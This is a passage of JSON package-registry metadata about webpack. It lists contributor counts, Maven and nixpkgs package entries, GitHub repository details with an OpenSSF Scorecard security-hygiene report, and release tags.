riptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:github-com-webpack-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:github-com-webpack-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:github-com-webpack-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:github-com-webpack-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:github-com-webpack-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:github-com-webpack-webpack/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620582,"maintainers_count":0,"namespaces_count":82431,"keywords_count":36859,"github":"maven-central","metadata":{"funded_packages_count":48141,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-02T05:05:01.920Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":12797514,"name":"nodePackages.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T14:00:22.063Z","latest_release_published_at":"2026-01-26T14:00:22.063Z","latest_release_number":"5.83.1","last_synced_at":"2026-04-03T05:09:26.011Z","created_at":"2026-01-26T14:00:21.883Z","updated_at":"2026-08-31T08:12:06.292Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=nodePackages.webpack","install_command":"nix-env -iA nixpkgs.nodePackages.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/node-packages/node-packages.nix#L153596","metadata":{"nix_attribute":"webpack-5.83.1","position":"pkgs/development/node-packages/node-packages.nix:153596","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/